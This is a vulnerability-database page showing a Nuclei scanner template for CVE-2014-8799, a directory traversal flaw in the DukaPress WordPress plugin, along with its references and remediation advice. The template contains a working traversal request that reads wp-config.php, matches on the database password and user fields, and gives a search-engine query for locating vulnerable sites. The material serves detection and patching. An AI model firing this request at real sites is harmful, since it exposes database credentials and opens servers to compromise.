Lucene search
K

WordPress Plugin DukaPress 2.5.2 - Directory Traversal

🗓️ 14 Jun 2026 03:03:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

WordPress Plugin DukaPress 2.5.2 - Directory Traversal vulnerability in dp_img_resize function allows remote attackers to read arbitrary files via src parameter to lib/dp_image.php

Related
Refs
Code
id: CVE-2014-8799

info:
  name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server.
  remediation: |
    Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
    - https://www.exploit-db.com/exploits/35346
    - https://wordpress.org/plugins/dukapress/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/98943
    - https://plugins.trac.wordpress.org/changeset/1024640/dukapress
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-8799
    cwe-id: CWE-22
    epss-score: 0.91126
    epss-percentile: 0.99665
    cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: dukapress
    product: dukapress
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/dukapress"
  tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
          - "DB_USER"
          - "DB_HOST"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d50652834d32f769e5803e7232e64624560be108115ee3b5b15bf4cb7c9a4b9702210089c0d0ada9128004fab21ebcc3743672b941463a0e29b8c590f3d7e3d0eee115:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.6High risk
Vulners AI Score8.6
CVSS 25
EPSS0.91126
24